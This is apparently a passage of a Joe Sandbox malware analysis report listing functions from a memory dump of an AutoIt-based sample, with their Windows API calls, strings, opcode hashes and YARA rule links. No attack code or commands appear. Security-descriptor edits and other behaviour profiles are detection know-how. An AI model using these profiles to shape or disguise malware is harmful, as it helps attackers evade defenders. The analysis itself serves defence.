                                                                                                                                                            • Part of subcall function 0016C890: _wcscat.LIBCMT ref: 0016C9E3
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                                                                                          • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                                                          • API String ID: 2955681530-2806939583
                                                                                                                                                          • Opcode ID: 53cd2705269e71583e8ee006d0e9a3e3744f949a1cca1edeca40a0b27bb41285
                                                                                                                                                          • Instruction ID: 5d198f1357c0ed783dd952f35ed570ac10757f6c9b85562d923776b8f126b4d8
                                                                                                                                                          • Opcode Fuzzy Hash: 53cd2705269e71583e8ee006d0e9a3e3744f949a1cca1edeca40a0b27bb41285
                                                                                                                                                          • Instruction Fuzzy Hash: EE91B271504701EFCB21EF50D955F9BB3E8AF98314F00885DF5499B2A2EB34EA54CB52
                                                                                                                                                          Function 0018CC68 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • _memset.LIBCMT ref: 0018CD0B
                                                                                                                                                          • DestroyWindow.USER32(00000000,?), ref: 0018CD83
                                                                                                                                                            • Part of subcall function 00127E53: _memmove.LIBCMT ref: 00127EB9
                                                                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0018CE04
                                                                                                                                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0018CE26
                                                                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0018CE35
                                                                                                                                                          • DestroyWindow.USER32(?), ref: 0018CE52
                                                                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00120000,00000000), ref: 0018CE85
                                                                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0018CEA4
                                                                                                                                                          • GetDesktopWindow.USER32 ref: 0018CEB9
                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 0018CEC0
                                                                                                                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0018CED2
                                                                                                                                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0018CEEA
                                                                                                                                                            • Part of subcall function 0013B155: GetWindowLongW.USER32(?,000000EB), ref: 0013B166
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                                                          • String ID: 0$tooltips_class32
                                                                                                                                                          • API String ID: 1297703922-3619404913
                                                                                                                                                          • Opcode ID: 6e07ce3d872c7e501eae91379402752d7bb990381d45e16223d47fdeb9ccf955
                                                                                                                                                          • Instruction ID: 5da526cc4142f16cfb9ed267371b9aad16ebcdb478bac5af40f9afc6a55771c5
                                                                                                                                                          • Opcode Fuzzy Hash: 6e07ce3d872c7e501eae91379402752d7bb990381d45e16223d47fdeb9ccf955
                                                                                                                                                          • Instruction Fuzzy Hash: 2771FD71140349AFD724DF28DC84FAA7BE5FB89704F44091CF9869B6A1DB30EA41CB61
                                                                                                                                                          Function 0016B428 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 350timeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • VariantInit.OLEAUT32(00000000), ref: 0016B46D
                                                                                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 0016B476
                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0016B482
                                                                                                                                                          • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0016B561
                                                                                                                                                          • __swprintf.LIBCMT ref: 0016B591
                                                                                                                                                          • VarR8FromDec.OLEAUT32(?,?), ref: 0016B5BD
                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 0016B63F
                                                                                                                                                          • SysFreeString.OLEAUT32(00000016), ref: 0016B6D1
                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0016B727
                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0016B736
                                                                                                                                                          • VariantInit.OLEAUT32(00000000), ref: 0016B772
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                                                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                                          • API String ID: 3730832054-3931177956
                                                                                                                                                          • Opcode ID: 61c50ab371a99a28c80851c151efccdca5b3633f10771a8942794a737e944b32
                                                                                                                                                          • Instruction ID: 59e54e9c9a9b1c6e4380307ae644f952331851ef9445072383eb2a876dff81c7
                                                                                                                                                          • Opcode Fuzzy Hash: 61c50ab371a99a28c80851c151efccdca5b3633f10771a8942794a737e944b32
                                                                                                                                                          • Instruction Fuzzy Hash: 67C1EE71A08615EBCB24EF65DCC4B69B7B4BF09300F158465E40ADB992DB74ECE0DBA0
                                                                                                                                                          Function 00186F67 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 00186FF9
                                                                                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00187044
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BuffCharMessageSendUpper
                                                                                                                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                          • API String ID: 3974292440-4258414348
                                                                                                                                                          • Opcode ID: bd89da0a6cde1134cb234551954aa944307c979553092e0d74d20948a3d6244b
                                                                                                                                                          • Instruction ID: 4453c8a0a4c08a85b3fb9c74ded9ef0ada7e36f51fb264ea3797ae9164160325
                                                                                                                                                          • Opcode Fuzzy Hash: bd89da0a6cde1134cb234551954aa944307c979553092e0d74d20948a3d6244b
                                                                                                                                                          • Instruction Fuzzy Hash: 339194346087019FCB18FF14D851A6AB7A2AFA4354F14485DF8966B3E3DB31EE1ACB41
                                                                                                                                                          Function 0018E305 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0018E3BB
                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0018BCBF), ref: 0018E417
                                                                                                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0018E457
                                                                                                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0018E49C
                                                                                                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0018E4D3
                                                                                                                                                          • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0018BCBF), ref: 0018E4DF
                                                                                                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0018E4EF
                                                                                                                                                          • DestroyCursor.USER32(?), ref: 0018E4FE
                                                                                                                                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0018E51B
                                                                                                                                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0018E527
                                                                                                                                                            • Part of subcall function 00141BC7: __wcsicmp_l.LIBCMT ref: 00141C50
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                                                                                                                                          • String ID: .dll$.exe$.icl
                                                                                                                                                          • API String ID: 3907162815-1154884017
                                                                                                                                                          • Opcode ID: 6fefe355cbd6a2c64ab8be4f1d62a15532facd80147d6a0d02f5d2616853ed66
                                                                                                                                                          • Instruction ID: b2d759ab70213c6ec946e08944ddb5afad0aed76965ce1bdeca6b3658ad583ab
                                                                                                                                                          • Opcode Fuzzy Hash: 6fefe355cbd6a2c64ab8be4f1d62a15532facd80147d6a0d02f5d2616853ed66
                                                                                                                                                          • Instruction Fuzzy Hash: 7761CD71600615BFEB14EF64DC46FAA77A8BB09720F104205F915E61D1EBB4EA90CBA0
                                                                                                                                                          Function 00170E41 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 184timeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 00170EFF
                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00170F0F
                                                                                                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00170F1B
                                                                                                                                                          • __wsplitpath.LIBCMT ref: 00170F79
                                                                                                                                                          • _wcscat.LIBCMT ref: 00170F91
                                                                                                                                                          • _wcscat.LIBCMT ref: 00170FA3
                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00170FB8
                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00170FCC
                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00170FFE
                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0017101F
                                                                                                                                                          • _wcscpy.LIBCMT ref: 0017102B
                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0017106A
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                                                          • String ID: *.*
                                                                                                                                                          • API String ID: 3566783562-438819550
                                                                                                                                                          • Opcode ID: 9fa497c2b518d4416322a8f138223d204fea9d646e4480b32a72d67e4c227a1c
                                                                                                                                                          • Instruction ID: 745e278f0311ff008e6b425b177e8c560f6a80ab03a69b79cd28005f7e4a2eaa
                                                                                                                                                          • Opcode Fuzzy Hash: 9fa497c2b518d4416322a8f138223d204fea9d646e4480b32a72d67e4c227a1c
                                                                                                                                                          • Instruction Fuzzy Hash: 1B614AB2504745AFCB10EF64C844A9AB3F8FF99310F04891AF98987251EB31EA45CB92
                                                                                                                                                          Function 0016DAAD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 001284A6: __swprintf.LIBCMT ref: 001284E5
                                                                                                                                                            • Part of subcall function 001284A6: __itow.LIBCMT ref: 00128519
                                                                                                                                                          • CharLowerBuffW.USER32(?,?), ref: 0016DB26
                                                                                                                                                          • GetDriveTypeW.KERNEL32 ref: 0016DB73
                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0016DBBB
                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0016DBF2
                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0016DC20
                                                                                                                                                            • Part of subcall function 00127E53: _memmove.LIBCMT ref: 00127EB9
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                          • API String ID: 2698844021-4113822522
                                                                                                                                                          • Opcode ID: 017bf36a393c2dca34f7a94dd8e31a37803006fc1c26efa95ac02150998b2f0b
                                                                                                                                                          • Instruction ID: 552dd9ac25185238b7369d82ab523ee9675887fab6465576d5695d715b87723d
                                                                                                                                                          • Opcode Fuzzy Hash: 017bf36a393c2dca34f7a94dd8e31a37803006fc1c26efa95ac02150998b2f0b
                                                                                                                                                          • Instruction Fuzzy Hash: 82518D716047059FC704EF10E99196BB7E8FF98718F00486DF896972A1DB31EE15CB52
                                                                                                                                                          Function 00163110 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 129windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00194085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 00163145
                                                                                                                                                          • LoadStringW.USER32(00000000,?,00194085,00000016), ref: 0016314E
                                                                                                                                                            • Part of subcall function 0012CAEE: _memmove.LIBCMT ref: 0012CB2F
                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00194085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 00163170
                                                                                                                                                          • LoadStringW.USER32(00000000,?,00194085,00000016), ref: 00163173
                                                                                                                                                          • __swprintf.LIBCMT ref: 001631B3
                                                                                                                                                          • __swprintf.LIBCMT ref: 001631C5
                                                                                                                                                          • _wprintf.LIBCMT ref: 0016326C
                                                                                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00163283
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                          • API String ID: 984253442-2268648507
                                                                                                                                                          • Opcode ID: f115d3764f24c7aac5b79a091ac677a38409c86a801b375404a6d55b1579bdea
                                                                                                                                                          • Instruction ID: 1c203df9ea284e80da13ca768e454c7e1a6fc0bb04af10e269f55dc203fc24b8
                                                                                                                                                          • Opcode Fuzzy Hash: f115d3764f24c7aac5b79a091ac677a38409c86a801b375404a6d55b1579bdea
                                                                                                                                                          • Instruction Fuzzy Hash: 7F413071900219BACB14FB90ED96EEEB77DAF24701F500066F215B20A2EF756F64CA61
                                                                                                                                                          Function 0015B593 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0015B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0015B903
                                                                                                                                                            • Part of subcall function 0015B8E7: GetLastError.KERNEL32(?,0015B3CB,?,?,?), ref: 0015B90D
                                                                                                                                                            • Part of subcall function 0015B8E7: GetProcessHeap.KERNEL32(00000008,?,?,0015B3CB,?,?,?), ref: 0015B91C
                                                                                                                                                            • Part of subcall function 0015B8E7: RtlAllocateHeap.NTDLL(00000000,?,0015B3CB), ref: 0015B923
                                                                                                                                                            • Part of subcall function 0015B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0015B93A
                                                                                                                                                            • Part of subcall function 0015B982: GetProcessHeap.KERNEL32(00000008,0015B3E1,00000000,00000000,?,0015B3E1,?), ref: 0015B98E
                                                                                                                                                            • Part of subcall function 0015B982: RtlAllocateHeap.NTDLL(00000000,?,0015B3E1), ref: 0015B995
                                                                                                                                                            • Part of subcall function 0015B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0015B3E1,?), ref: 0015B9A6
                                                                                                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0015B5F7
                                                                                                                                                          • _memset.LIBCMT ref: 0015B60C
                                                                                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0015B62B
                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 0015B63C
                                                                                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 0015B679
                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0015B695
                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 0015B6B2
                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0015B6C1
                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 0015B6C8
                                                                                                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0015B6E9
                                                                                                                                                          • CopySid.ADVAPI32(00000000), ref: 0015B6F0
                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0015B721
                                                                                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0015B747
                                                                                                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0015B75B
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
